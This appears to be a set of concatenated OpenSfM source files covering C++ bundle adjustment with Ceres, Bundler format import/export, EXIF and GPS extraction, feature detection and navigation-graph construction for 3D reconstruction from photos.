f_pre[image] = f_pre[image][:preemptive_max,:]
exifs[image] = data.load_exif(image)
start = time.time()
p = Pool(data.config.get('processes',1))
p.map(match, image_pairs(images))
end = time.time()
with open(data.profile_log(), 'a') as fout:
fout.write('match_features: {0}\n'.format(end - start))
<file_sep>#include <cmath>
#include <cstdio>
#include <iostream>
#include <fstream>
#include <map>
#include <string>
extern "C" {
#include <string.h>
}
#include "ceres/ceres.h"
#include "ceres/rotation.h"
#include "ceres/loss_function.h"
class TruncatedLoss : public ceres::LossFunction {
public:
explicit TruncatedLoss(double t)
: t2_(t*t) {
CHECK_GT(t, 0.0);
}
virtual void Evaluate(double s, double rho[3]) const {
if (s >= t2_) {
// Outlier.
rho[0] = t2_;
rho[1] = std::numeric_limits<double>::min();
rho[2] = 0.0;
} else {
// Inlier.
rho[0] = s;
rho[1] = 1.0;
rho[2] = 0.0;
}
}
private:
const double t2_;
};
// Templated pinhole camera model for used with Ceres. The camera is
// parameterized using 9 parameters: 3 for rotation, 3 for translation, 1 for
// focal length and 2 for radial distortion. The principal point is not modeled
// (i.e. it is assumed to be located at the image center).
struct SnavelyReprojectionError {
SnavelyReprojectionError(double observed_x, double observed_y, double std_deviation)
: observed_x_(observed_x)
, observed_y_(observed_y)
, scale_(1.0 / std_deviation / sqrt(2))
{}
template <typename T>
bool operator()(const T* const camera,
const T* const shot,
const T* const point,
T* residuals) const {
// shot[0,1,2] are the angle-axis rotation.
T p[3];
ceres::AngleAxisRotatePoint(shot, point, p);
// shot[3,4,5] are the translation.
p[0] += shot[3];
p[1] += shot[4];
p[2] += shot[5];
// Project.
T xp = p[0] / p[2];
T yp = p[1] / p[2];
// Apply second and fourth order radial distortion.
const T& l1 = camera[1];
const T& l2 = camera[2];
T r2 = xp * xp + yp * yp;
T distortion = T(1.0) + r2 * (l1 + l2 * r2);
// Compute final projected point position.
const T& focal = camera[0];
T predicted_x = focal * distortion * xp;
T predicted_y = focal * distortion * yp;
// The error is the difference between the predicted and observed position.
residuals[0] = T(scale_) * (predicted_x - T(observed_x_));
residuals[1] = T(scale_) * (predicted_y - T(observed_y_));
return true;
}
double observed_x_;
double observed_y_;
double scale_;
};
struct FocalPriorError {
FocalPriorError(double estimate, double std_deviation)
: estimate_(estimate)
, scale_(1.0 / std_deviation / sqrt(2))
{}
template <typename T>
bool operator()(const T* const focal, T* residuals) const {
residuals[0] = T(scale_) * (*focal - T(estimate_));
return true;
}
double estimate_;
double scale_;
};
struct GPSPriorError {
GPSPriorError(double x, double y, double z, double std_deviation)
: x_(x), y_(y), z_(z)
, scale_(1.0 / std_deviation / sqrt(2))
{}
template <typename T>
bool operator()(const T* const shot, T* residuals) const {
// shot[0,1,2] are the angle-axis rotation.
T p[3];
ceres::AngleAxisRotatePoint(shot, shot + 3, p);
residuals[0] = T(scale_) * (-p[0] - T(x_));
residuals[1] = T(scale_) * (-p[1] - T(y_));
residuals[2] = T(scale_) * (-p[2] - T(z_));
return true;
}
double x_, y_, z_;
double scale_;
};
enum {
BA_CAMERA_FOCAL,
BA_CAMERA_K1,
BA_CAMERA_K2,
BA_CAMERA_NUM_PARAMS
};
struct BACamera {
double parameters[BA_CAMERA_NUM_PARAMS];
bool constant;
double exif_focal;
std::string id;
double GetFocal() { return parameters[BA_CAMERA_FOCAL]; }
double GetK1() { return parameters[BA_CAMERA_K1]; }
double GetK2() { return parameters[BA_CAMERA_K2]; }
void SetFocal(double v) { parameters[BA_CAMERA_FOCAL] = v; }
void SetK1(double v) { parameters[BA_CAMERA_K1] = v; }
void SetK2(double v) { parameters[BA_CAMERA_K2] = v; }
};
enum {
BA_SHOT_RX,
BA_SHOT_RY,
BA_SHOT_RZ,
BA_SHOT_TX,
BA_SHOT_TY,
BA_SHOT_TZ,
BA_SHOT_NUM_PARAMS
};
struct BAShot {
double parameters[BA_SHOT_NUM_PARAMS];
bool constant;
double gps_x, gps_y, gps_z;
double gps_dop;
int exif_orientation;
std::string camera;
std::string id;
double GetRX() { return parameters[BA_SHOT_RX]; }
double GetRY() { return parameters[BA_SHOT_RY]; }
double GetRZ() { return parameters[BA_SHOT_RZ]; }
double GetTX() { return parameters[BA_SHOT_TX]; }
double GetTY() { return parameters[BA_SHOT_TY]; }
double GetTZ() { return parameters[BA_SHOT_TZ]; }
void SetRX(double v) { parameters[BA_SHOT_RX] = v; }
void SetRY(double v) { parameters[BA_SHOT_RY] = v; }
void SetRZ(double v) { parameters[BA_SHOT_RZ] = v; }
void SetTX(double v) { parameters[BA_SHOT_TX] = v; }
void SetTY(double v) { parameters[BA_SHOT_TY] = v; }
void SetTZ(double v) { parameters[BA_SHOT_TZ] = v; }
};
struct BAPoint {
double coordinates[3];
bool constant;
std::string id;
double GetX() { return coordinates[0]; }
double GetY() { return coordinates[1]; }
double GetZ() { return coordinates[2]; }
void SetX(double v) { coordinates[0] = v; }
void SetY(double v) { coordinates[1] = v; }
void SetZ(double v) { coordinates[2] = v; }
};
struct BAObservation {
double coordinates[2];
BACamera *camera;
BAShot *shot;
BAPoint *point;
};
// A bundle adjustment class for optimizing the problem
//
// sum_p ( reprojection_error(p) / reprojection_error_sd )^2 / 2
// + sum_c ( (focal - focal_prior) / focal_prior_sd )^2 / 2
//
class BundleAdjuster {
public:
BundleAdjuster() {
reprojection_error_sd_ = 1;
focal_prior_sd_ = 1;
}
virtual ~BundleAdjuster() {}
BACamera GetCamera(const std::string &id) {
return cameras_[id];
}
BAShot GetShot(const std::string &id) {
return shots_[id];
}
BAPoint GetPoint(const std::string &id) {
return points_[id];
}
void AddCamera(
const std::string &id,
double focal,
double k1,
double k2,
double exif_focal,
bool constant) {
BACamera c;
c.id = id;
c.parameters[BA_CAMERA_FOCAL] = focal;
c.parameters[BA_CAMERA_K1] = k1;
c.parameters[BA_CAMERA_K2] = k2;
c.constant = constant;
c.exif_focal = exif_focal;
cameras_[id] = c;
}
void AddShot(
const std::string &id,
const std::string &camera,
double rx,
double ry,
double rz,
double tx,
double ty,
double tz,
double gpsx,
double gpsy,
double gpsz,
double gps_dop,
bool constant) {
BAShot s;
s.id = id;
s.camera = camera;
s.parameters[BA_SHOT_RX] = rx;
s.parameters[BA_SHOT_RY] = ry;
s.parameters[BA_SHOT_RZ] = rz;
s.parameters[BA_SHOT_TX] = tx;
s.parameters[BA_SHOT_TY] = ty;
s.parameters[BA_SHOT_TZ] = tz;
s.constant = constant;
s.gps_x = gpsx;
s.gps_y = gpsy;
s.gps_z = gpsz;
s.gps_dop = gps_dop;
shots_[id] = s;
}
void AddPoint(
const std::string &id,
double x,
double y,
double z,
bool constant) {
BAPoint p;
p.id = id;
p.coordinates[0] = x;
p.coordinates[1] = y;
p.coordinates[2] = z;
p.constant = constant;
points_[id] = p;
}
void AddObservation(
const std::string &shot,
const std::string &point,
double x,
double y) {
BAObservation o;
o.shot = &shots_[shot];
o.camera = &cameras_[o.shot->camera];
o.point = &points_[point];
o.coordinates[0] = x;
o.coordinates[1] = y;
observations_.push_back(o);
}
void SetLossFunction(const std::string &function_name,
double threshold) {
loss_function_ = function_name;
loss_function_threshold_ = threshold;
}
void SetReprojectionErrorSD(double sd) {
reprojection_error_sd_ = sd;
}
void SetFocalPriorSD(double sd) {
focal_prior_sd_ = sd;
}
void Run() {
ceres::LossFunction *loss;
if (loss_function_.compare("TruncatedLoss") == 0) {
loss = new TruncatedLoss(loss_function_threshold_);
} else if (loss_function_.compare("TrivialLoss") == 0) {
loss = new ceres::TrivialLoss();
} else if (loss_function_.compare("HuberLoss") == 0) {
loss = new ceres::HuberLoss(loss_function_threshold_);
} else if (loss_function_.compare("SoftLOneLoss") == 0) {
loss = new ceres::SoftLOneLoss(loss_function_threshold_);
} else if (loss_function_.compare("CauchyLoss") == 0) {
loss = new ceres::CauchyLoss(loss_function_threshold_);
} else if (loss_function_.compare("ArctanLoss") == 0) {
loss = new ceres::ArctanLoss(loss_function_threshold_);
}
// Create residuals for each observation in the bundle adjustment problem. The
// parameters for cameras and points are added automatically.
ceres::Problem problem;
for (int i = 0; i < observations_.size(); ++i) {
// Each Residual block takes a point and a camera as input and outputs a 2
// dimensional residual. Internally, the cost function stores the observed
// image location and compares the reprojection against the observation.
ceres::CostFunction* cost_function =
new ceres::AutoDiffCostFunction<SnavelyReprojectionError, 2, 3, 6, 3>(
new SnavelyReprojectionError(observations_[i].coordinates[0],
observations_[i].coordinates[1],
reprojection_error_sd_));
problem.AddResidualBlock(cost_function,
loss,
observations_[i].camera->parameters,
observations_[i].shot->parameters,
observations_[i].point->coordinates);
}
for (auto &i : cameras_) {
ceres::CostFunction* cost_function =
new ceres::AutoDiffCostFunction<FocalPriorError, 1, 3>(
new FocalPriorError(i.second.exif_focal, focal_prior_sd_));
problem.AddResidualBlock(cost_function,
NULL,
i.second.parameters);
}
// for (auto &i : shots_) {
// ceres::CostFunction* cost_function =
// new ceres::AutoDiffCostFunction<GPSPriorError, 3, 6>(
// new GPSPriorError(i.second.gps_position[0],
// i.second.gps_position[1],
// i.second.gps_position[2],
// i.second.gps_dop));
// problem.AddResidualBlock(cost_function,
// NULL,
// i.second.parameters);
// }
// Set constant parameter blocks.
for (auto &i : cameras_) {
if (i.second.constant) {
problem.SetParameterBlockConstant(i.second.parameters);
}
}
for (auto &i : shots_) {
if (i.second.constant) {
problem.SetParameterBlockConstant(i.second.parameters);
}
}
for (auto &i : points_) {
if (i.second.constant) {
problem.SetParameterBlockConstant(i.second.coordinates);
}
}
// Solve
ceres::Solver::Options options;
options.linear_solver_type = ceres::SPARSE_SCHUR;
options.num_threads = 8;
options.num_linear_solver_threads = 8;
ceres::Solve(options, &problem, &last_run_summary_);
}
std::string BriefReport() {
return last_run_summary_.BriefReport();
}
std::string FullReport() {
return last_run_summary_.FullReport();
}
private:
std::map<std::string, BACamera> cameras_;
std::map<std::string, BAShot> shots_;
std::map<std::string, BAPoint> points_;
std::vector<BAObservation> observations_;
std::string loss_function_;
double loss_function_threshold_;
double reprojection_error_sd_;
double focal_prior_sd_;
ceres::Solver::Summary last_run_summary_;
};
<file_sep># -*- coding: utf-8 -*-
import os
abspath = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
SENSOR = os.path.join(abspath, 'share/opensfm/sensor_data.json')
<file_sep>import os
import argparse
import cv2
import json
import numpy as np
import errno
# (TODO): ensure the image order from OpenSfM is the same as Bundler
# (TODO): ensure the coordinate systems are consistent
def export_bundler(image_list, reconstructions, track_graph, bundle_file_path, list_file_path):
"""
Generate a reconstruction file that is consistent with Bundler's format
"""
if not os.path.exists(bundle_file_path): os.makedirs(bundle_file_path)
if not os.path.exists(list_file_path): os.makedirs(list_file_path)
for j, reconstruction in enumerate(reconstructions):
lines = []
lines.append("# Bundle file v0.3")
points = reconstruction['points']
shots = reconstruction['shots']
cameras = reconstruction['cameras']
num_point = len(points)
num_shot = len(image_list)
lines.append(' '.join(map(str, [num_shot, num_point])))
shots_order = {key: i for i, key in enumerate(image_list)}
# cameras
for shot_id in image_list:
if shot_id in shots:
shot = shots[shot_id]
camera = cameras[shot['camera']]
scale = max(camera['width'], camera['height'])
focal = camera['focal'] * scale
k1 = camera['k1']
k2 = camera['k2']
R, t = shot['rotation'], shot['translation']
R = cv2.Rodrigues(np.array(R))[0]
R[1], R[2] = -R[1], -R[2] # Reverse y and z
t[1], t[2] = -t[1], -t[2]
lines.append(' '.join(map(str, [focal, k1, k2])))
for i in xrange(3): lines.append(' '.join(list(map(str, R[i]))))
t = ' '.join(map(str, t))
lines.append(t)
else:
for i in range(5):
lines.append("0 0 0")
# tracks
for point_id, point in points.iteritems():
coord = point['coordinates']
color = map(int, point['color'])
view_list = track_graph[point_id]
lines.append(' '.join(map(str, coord)))
lines.append(' '.join(map(str, color)))
view_line = []
for shot_key, view in view_list.iteritems():
if shot_key in shots.keys():
v = view['feature']
shot_index = shots_order[shot_key]
camera = shots[shot_key]['camera']
scale = max(cameras[camera]['width'], cameras[camera]['height'])
x = v[0] * scale
y = -v[1] * scale
view_line.append(' '.join(map(str, [shot_index, view['feature_id'], x, y])))
lines.append(str(len(view_line)) + ' ' + ' '.join(view_line))
bundle_file =os.path.join(bundle_file_path, 'bundle_r'+str(j).zfill(3)+'.out')
with open(bundle_file, 'wb') as fout:
fout.writelines('\n'.join(lines) + '\n')
list_file =os.path.join(list_file_path, 'list_r'+str(j).zfill(3)+'.out')
with open(list_file, 'wb') as fout:
fout.writelines('\n'.join(map(str, image_list)))
def import_bundler(data_path, bundle_file, list_file, track_file, reconstruction_file=None):
"""
Return a reconstruction dict and a track graph file (track.csv) compatible with OpenSfM from a Bundler output
"""
# (TODO): handle cameras with exif info in reconstruction['cameras']
# camera model
# image width/height for denormalizing coordinates, principle point
# Init OpenSfM working folder.
mkdir_p(data_path)
# Copy image list.
list_dir = os.path.dirname(list_file)
with open(list_file, 'rb') as fin:
lines = fin.read().splitlines()
ordered_shots = []
image_list = []
for line in lines:
image_path = os.path.join(list_dir, line.split()[0])
rel_to_data = os.path.relpath(image_path, data_path)
image_list.append(rel_to_data)
ordered_shots.append(os.path.basename(image_path))
with open(os.path.join(data_path, 'image_list.txt'), 'w') as fout:
fout.write('\n'.join(image_list) + '\n')
# Check for bundle_file
if not bundle_file or not os.path.isfile(bundle_file):
return None
with open(bundle_file, 'rb') as fin:
lines = fin.readlines()
offset = 1 if '#' in lines[0] else 0
# header
num_shot, num_point = map(int, lines[offset].split(' '))
offset += 1
# initialization
reconstruction = {}
reconstruction['cameras'] = {}
reconstruction['shots'] = {}
reconstruction['points'] = {}
track_graph = {}
# cameras
for i in xrange(num_shot):
# Creating a model for each shot for now.
# TODO: create mdoel based on exif
shot_key = ordered_shots[i]
focal, k1, k2 = map(float, lines[offset].rstrip('\n').split(' '))
if focal > 0:
camera_name = 'camera_' + str(i)
im = cv2.imread(os.path.join(data_path, image_list[i]))
height, width = im.shape[0:2]
scale = float(max(height, width))
focal = focal / scale
reconstruction['cameras'][camera_name] = {'focal': focal, 'k1': k1, 'k2': k2, 'width': width, 'height': height}
# Shots
rline = []
for k in xrange(3): rline += lines[offset+1+k].rstrip('\n').split(' ')
R = ' '.join(rline)
t = lines[offset+4].rstrip('\n').split(' ')
R = np.array(map(float, R.split())).reshape(3,3)
t = np.array(map(float, t))
R[1], R[2] = -R[1], -R[2] # Reverse y and z
t[1], t[2] = -t[1], -t[2]
reconstruction['shots'][shot_key] = {
'camera' : camera_name,
'rotation': list(cv2.Rodrigues(R)[0].flatten(0)),
'translation': list(t)
}
else:
print 'ignore failed image', shot_key
offset += 5
# tracks
track_lines = []
for i in xrange(num_point):
coordinates = lines[offset].rstrip('\n').split(' ')
color = lines[offset+1].rstrip('\n').split(' ')
reconstruction['points'][i] = {
'coordinates': map(float, coordinates),
'color': map(int, color)
}
view_line = lines[offset+2].rstrip('\n').split(' ')
# num_view, view_list = int(view_line[0]), view_line[1:].rstrip('\n').split(' ')
num_view, view_list = int(view_line[0]), view_line[1:]
for k in xrange(num_view):
shot_key = ordered_shots[int(view_list[4*k])]
camera_name = reconstruction['shots'][shot_key]['camera']
scale = max(reconstruction['cameras'][camera_name]['width'], reconstruction['cameras'][camera_name]['height'])
v = '\t'.join([ shot_key,
str(i),
view_list[4*k + 1],
str(float(view_list[4*k + 2])/scale),
str(-float(view_list[4*k + 3])/scale)
])
track_lines.append(v)
offset += 3
# save track file
with open(track_file, 'wb') as fout:
fout.writelines('\n'.join(track_lines))
# save reconstruction
if reconstruction_file is not None:
with open(reconstruction_file, 'wb') as fout:
fout.write(json.dumps([reconstruction], indent=4))
return reconstruction
def mkdir_p(path):
'''Make a directory including parent directories.
'''
try:
os.makedirs(path)
except os.error as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
<file_sep>networkx
PyYAML
numpy
exifread
gpxpy
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import argparse
import time
import json
import numpy as np
import scipy.spatial.distance as dist
import networkx as nx
from opensfm import dataset, reconstruction
def vector2_angle(x1, y1, x2, y2):
""" Calculates the angle between two vectors on the plane.
:param x1: The x coordinate for the first vector
:param y1: The y coordinate for the first vector
:param x2: The x coordinate for the second vector
:param y2: The y coordinate for the second vector
:return: The angle between the vectors
"""
angle = np.arctan2(y1, x1) - np.arctan2(y2, x2)
if angle > np.pi:
return angle - 2 * np.pi
elif angle < -np.pi:
return angle + 2 * np.pi
else:
return angle
def angle_diff(a1, a2):
""" Calculates the difference between two angles.
:param a1: Array of angles
:param a2: The angle to subtract
:return: The difference between the angles
"""
angles = a1 - a2
angles[angles > np.pi] -= 2 * np.pi
angles[angles < -np.pi] += 2 * np.pi
return angles
def get_direction_turns_and_motion_angles(min_distance, max_distance, distances, position, direction, positions, directions):
""" Retrieves the indices for the positions within a distance from the position in the
interval between the minimum distance and the maximum distance.
Also calculates the direction change and the difference in motion with respect to the direction for
the retrieved positions.
:param min_distance: Float specifying the minimum distance to the position.
:param max_distance: Float specifying the maximum distance to the position.
:param distances: The distances for the other positions to the position.
:param position: The position.
:param direction: The direction for the position.
:param position: All positions.
:param directions: All directions.
:return: The indices of the positions in the specified interval. The direction turns in radians in the plane and the
motion turns in radians in the plane with respect to the direction.
"""
# Order positions within interval according to shortest distance
position_indices = np.where((min_distance < distances) & (distances < max_distance))[0]
ordered_indices = position_indices[np.argsort(distances[position_indices])]
motions = positions[ordered_indices] - position
motion_angles = np.array(
[vector2_angle(direction[0], direction[1], motion[0], motion[1]) for motion in motions],
float)
direction_turns = np.array(
[vector2_angle(direction[0], direction[1], other_direction[0], other_direction[1])
for other_direction in directions[ordered_indices]],
float)
return ordered_indices, direction_turns, motion_angles
def create_optical_center_graph(reconstructions, config):
optical_centers = []
viewing_directions = []
shot_ids = []
for r in reconstructions:
for shot_id in r['shots'].keys():
shot = r['shots'][shot_id]
optical_centers.append(reconstruction.optical_center(shot))
viewing_directions.append(reconstruction.viewing_direction(shot))
shot_ids.append(shot_id)
optical_centers = np.vstack(optical_centers)
viewing_directions = np.vstack(viewing_directions)
D = dist.squareform(dist.pdist(optical_centers))
min_distance = config.get('nav_min_distance', 0.01)
step_max_distance = config.get('nav_step_max_distance', 20)
step_forward_viewing_threshold = config.get('nav_step_forward_view_threshold', 0.25)
step_viewing_threshold = config.get('nav_step_view_threshold', 0.5)
step_drift_threshold = config.get('nav_step_drift_threshold', 0.5)
turn_max_distance = config.get('nav_turn_max_distance', 15)
turn_viewing_threshold = config.get('nav_turn_view_threshold', 0.7)
direction = 'direction'
viewing = 'viewing'
drift = 'drift'
steps = {
'step_forward': {direction: 0, viewing: step_forward_viewing_threshold, drift: step_drift_threshold},
'step_backward': {direction: np.pi, viewing: 2 * step_viewing_threshold, drift: step_drift_threshold},
'step_left': {direction: -np.pi / 2, viewing: 2 * step_viewing_threshold, drift: step_drift_threshold},
'step_right': {direction: np.pi / 2, viewing: 2 * step_viewing_threshold, drift: step_drift_threshold}
}
turns = {
'turn_left': {direction: -np.pi / 2, viewing: turn_viewing_threshold},
'turn_right': {direction: np.pi / 2, viewing: turn_viewing_threshold},
'turn_u': {direction: np.pi, viewing: turn_viewing_threshold}
}
graph = nx.DiGraph()
for i in range(0, D.shape[0]):
distances = D[i, :]
oc = optical_centers[i]
vd = viewing_directions[i]
ordered_indices, viewing_turns, motion_angles = get_direction_turns_and_motion_angles(
min_distance, step_max_distance, distances, oc, vd, optical_centers, viewing_directions
)
for key in steps:
step = steps[key]
motion_drift = angle_diff(motion_angles, step[direction])
motion_drift = np.max(np.vstack((np.abs(motion_drift - viewing_turns), np.abs(motion_drift))), 0)
step_indices = np.where((motion_drift < step[drift]) & (np.abs(viewing_turns) < step[viewing]))[0]
if len(step_indices) > 0:
step_index = ordered_indices[step_indices[0]]
graph.add_edge(shot_ids[i], shot_ids[step_index], weight=distances[step_index], direction=key)
ordered_indices, viewing_turns, motion_angles = get_direction_turns_and_motion_angles(
min_distance, turn_max_distance, distances, oc, vd, optical_centers, viewing_directions
)
for key in turns:
turn = turns[key]
viewing_diff = np.abs(angle_diff(viewing_turns, turn[direction]))
turn_indices = np.where((viewing_diff < turn[viewing]))[0]
if len(turn_indices) > 0:
turn_index = ordered_indices[turn_indices[0]]
graph.add_edge(shot_ids[i], shot_ids[turn_index], weight=distances[turn_index], direction=key)
return graph
if __name__ == "__main__":
start = time.time()
parser = argparse.ArgumentParser(description='Compute navigation graph from reconstruction')
parser.add_argument('dataset',
help='path to the dataset to be processed')
args = parser.parse_args()
data = dataset.DataSet(args.dataset)
recs = data.load_reconstruction()
navigation_graphs = []
rec_graph = create_optical_center_graph(recs, data.config)
navigation_graph = {
'edges': {},
'nodes': list(rec_graph.node)
}
for edge in rec_graph.edge:
navigation_graph['edges'][edge] = rec_graph.edge[edge]
navigation_graphs.append(navigation_graph)
data.save_navigation_graph(navigation_graphs)
end = time.time()
with open(data.profile_log(), 'a') as fout:
fout.write('Navigation graphs: {0}\n'.format(end - start))
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import os, sys
import time
from multiprocessing import Pool
import numpy as np
from opensfm import dataset
from opensfm import features
from opensfm import multiview
def usage():
print 'USAGE: %s data_set_path' % sys.argv[0]
sys.exit(0)
def detect(image):
print 'Extracting', data.feature_type().upper(), 'features for image', image
if not data.feature_index_exists(image):
p_unsorted, f_unsorted = features.extract_feature(data.image_as_array(image, grayscale=True), data.config)
if len(p_unsorted) == 0:
return
# camera = data.load_exif(image)
# if 'gopro' in camera['camera'].lower():
# camera['focal'] = camera['focal_ratio']* np.max([camera['height'], camera['width']])
# p_unsorted[:,0:2] = multiview.undistort_points(camera, p_unsorted[:,0:2].T).T
size = p_unsorted[:, 2]
order = np.argsort(size)
f_sorted = f_unsorted[order, :]
p_sorted = p_unsorted[order, :]
p_pre = p_sorted[-preemptive_max:]
f_pre = f_sorted[-preemptive_max:]
data.save_features(image, p_sorted, f_sorted)
data.save_preemptive_features(image, p_pre, f_pre)
index = features.build_flann_index(f_sorted, data.config)
data.save_feature_index(image, index)
if __name__ == "__main__":
if len(sys.argv) > 1:
path = sys.argv[1]
else:
usage()
data = dataset.DataSet(path)
images = data.images()
preemptive_max = data.config.get('preemptive_max', 200)
start = time.time()
processes = data.config.get('processes', 1)
if processes == 1:
for image in images:
detect(image)
else:
p = Pool(processes)
p.map(detect, images)
end = time.time()
with open(data.profile_log(), 'a') as fout:
fout.write('detect_features: {0}\n'.format(end - start))
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import json
import exifread
import numpy as np
from cv2 import imread
from opensfm.sensors import sensor_data
def eval_frac(value):
return float(value.num) / float(value.den)
def gps_to_decimal(values, reference):
sign = 1 if reference in 'NE' else -1
degrees = eval_frac(values[0])
minutes = eval_frac(values[1])
seconds = eval_frac(values[2])
return sign * (degrees + minutes / 60 + seconds / 3600)
def get_float_tag(tags, key):
if key in tags:
return float(tags[key].values[0])
else:
return None
def get_frac_tag(tags, key):
if key in tags:
return eval_frac(tags[key].values[0])
else:
return None
def compute_focal(focal_35, focal, sensor_width, sensor_string):
if focal_35 > 0:
focal_ratio = focal_35 / 36.0 # 35mm film produces 36x24mm pictures.
else:
if not sensor_width:
sensor_width = sensor_data.get(sensor_string, None)
if sensor_width and focal:
focal_ratio = focal / sensor_width
focal_35 = 36.0 * focal_ratio
else:
focal_35 = 0
focal_ratio = 0
return focal_35, focal_ratio
def get_distortion(make, model, fmm35):
if 'gopro' in make.lower():
if fmm35==20:
# GoPro Hero 3, 7MP medium
## calibration
d = np.array([-0.37, 0.28, 0, 0, 0])
elif fmm35==15:
# GoPro Hero 3, 7MP wide
# calibration
d = np.array([-0.32, 0.24, 0, 0, 0])
elif fmm35==23:
# GoPro Hero 2, 5MP medium
d = np.array([-0.38, 0.24, 0, 0, 0])
elif fmm35==16:
# GoPro Hero 2, 5MP wide
d = np.array([-0.39, 0.22, 0, 0, 0])
else:
raise ValueError("Unsupported f value.")
return list(d)
else:
return [0., 0., 0., 0., 0.]
def sensor_string(make, model):
if make != 'unknown':
model = model.replace(make, '') # remove possible duplicate 'make' information in 'model' for better matching
return (make.strip() + ' ' + model.strip()).lower()
def extract_exif_from_dict(exif_image):
model = exif_image.get('model', 'unknown')
make = exif_image.get('make', 'unknown')
sensor = sensor_string(make, model)
fmm35, fmm = float(exif_image.get('fmm35', 0)), float(exif_image.get('fmm', 0))
focal_35, focal_ratio = compute_focal(fmm35, fmm, None, sensor)
orientation = exif_image.get('orientation', 1)
k1 = exif_image.get('k1', 0)
k2 = exif_image.get('k2', 0)
width, height = exif_image.get('width', -1), exif_image.get('height', -1)
# gps
geo = {}
geo['latitude'] = float(exif_image.get('lat', 0.0))
geo['longitude'] = float(exif_image.get('lon', 0.0))
geo['altitude'] = float(exif_image.get('altitude', 0.0))
geo['dop'] = float(exif_image.get('gps_accuracy', -1))
if geo['dop'] < 0:
del geo['dop']
d = {
'width': width,
'height': height,
'focal_ratio': focal_ratio,
'focal_35mm_equiv': focal_35,
'camera': sensor,
'orientation': orientation,
'k1': k1,
'k2': k2,
'gps': geo
}
return d
def extract_exif_from_file(fileobj):
if isinstance(fileobj, (str, unicode)):
with open(fileobj) as f:
exif_data = EXIF(f)
else:
exif_data = EXIF(fileobj)
d = exif_data.extract_exif()
return d
class EXIF:
def __init__(self, fileobj):
self.tags = exifread.process_file(fileobj, details=False)
def extract_image_size(self):
# Image Width and Image Height
if 'EXIF ExifImageWidth' in self.tags and 'EXIF ExifImageLength' in self.tags:
width, height = (int(self.tags['EXIF ExifImageWidth'].values[0]),
int(self.tags['EXIF ExifImageLength'].values[0]) )
else:
width, height = -1, -1
return width, height
def extract_make(self):
# Camera make and model
if 'EXIF LensMake' in self.tags:
make = self.tags['EXIF LensMake'].values
elif 'Image Make' in self.tags:
make = self.tags['Image Make'].values
else:
make = 'unknown'
return make
def extract_model(self):
if 'EXIF LensModel' in self.tags:
model = self.tags['EXIF LensModel'].values
elif 'Image Model' in self.tags:
model = self.tags['Image Model'].values
else:
model = 'unknown'
return model
def extract_focal(self):
make, model = self.extract_make(), self.extract_model()
focal_35, focal_ratio = compute_focal(
get_float_tag(self.tags, 'EXIF FocalLengthIn35mmFilm'),
get_frac_tag(self.tags, 'EXIF FocalLength'),
get_frac_tag(self.tags, 'EXIF CCD width'),
sensor_string(make, model))
return focal_35, focal_ratio
def extract_orientation(self):
if 'Image Orientation' in self.tags:
orientation = self.tags.get('Image Orientation').values[0]
else:
orientation = 1
return orientation
def extract_distortion(self):
make, model = self.extract_make(), self.extract_model()
fmm35, fratio = self.extract_focal()
distortion = get_distortion(make, model, fmm35)
return distortion[0], distortion[1]
def extract_lon_lat(self):
if 'GPS GPSLatitude' in self.tags:
lat = gps_to_decimal(self.tags['GPS GPSLatitude'].values,
self.tags['GPS GPSLatitudeRef'].values)
lon = gps_to_decimal(self.tags['GPS GPSLongitude'].values,
self.tags['GPS GPSLongitudeRef'].values)
else:
lon, lat = None, None
return lon, lat
def extract_altitude(self):
if 'GPS GPSAltitude' in self.tags:
altitude = eval_frac(self.tags['GPS GPSAltitude'].values[0])
else:
altitude = None
return altitude
def extract_dop(self):
if 'GPS GPSDOP' in self.tags:
dop = eval_frac(self.tags['GPS GPSDOP'].values[0])
else:
dop = None
return dop
def extract_geo(self):
altitude = self.extract_altitude()
dop = self.extract_dop()
lon, lat = self.extract_lon_lat()
d = {}
if lon is not None and lat is not None:
d['latitude'] = lat
d['longitude'] = lon
if altitude is not None:
d['altitude'] = altitude
if dop is not None:
d['dop'] = dop
return d
def extract_exif(self):
width, height = self.extract_image_size()
focal_35, focal_ratio = self.extract_focal()
make, model = self.extract_make(), self.extract_model()
orientation = self.extract_orientation()
geo = self.extract_geo()
distortion = self.extract_distortion()
d = {
'width': width,
'height': height,
'focal_ratio': focal_ratio,
'focal_35mm_equiv': focal_35,
'camera': sensor_string(make, model),
'orientation': orientation,
'k1': distortion[0],
'k2': distortion[1]
}
# GPS
d['gps'] = geo
return d
<file_sep>#!/usr/bin/env python
import os.path, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import argparse
import json
import numpy as np
import opensfm.reconstruction as rc
import opensfm.io as io
from opensfm import dataset
from opensfm import exif
from opensfm.geotag_from_gpx import add_gps_to_exif
parser = argparse.ArgumentParser(
description="Align reconstruction with exif geotag information.")
parser.add_argument('dataset',
help='path to the dataset to be processed')
parser.add_argument('--output',
help='file where to store the aligned reconstruction.'
' By default, the original reconstruction is overwritten')
parser.add_argument('--image_path',
help='path to images')
args = parser.parse_args()
data_path = args.dataset
# handle GPS data
data = dataset.DataSet(data_path) # assumes that the images is in data_path/'images'
if args.image_path: data.set_image_path(args.image_path)
images = data.images()
for image in images:
if not data.load_exif(image)):
dexif = exif.EXIF(data.load_image(image))
exif_data = dexif.extract_exif()
data.save_exif(image, exif_data)
reconstructions = data.load_reconstruction()
# reference for conversion
try:
reference = data.load_reference_lla()
except:
reference = data.invent_reference_lla()
# alignment
for reconstruction in reconstructions:
for image in reconstruction['shots'].keys():
rc.add_gps_position(data, reconstruction, image)
rc.align_reconstruction(reconstruction, data.config)
# convert to lla
# reference = data.invent_reference_lla(list(reconstruction['shots'].keys()))
rc.register_reconstruction_with_gps(reconstruction, reference)
data.save_reconstruction(reconstructions, filename=args.output)
<file_sep>// Copyright (c) 2007, 2008 libmv authors.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to
// deal in the Software without restriction, including without limitation the
// rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
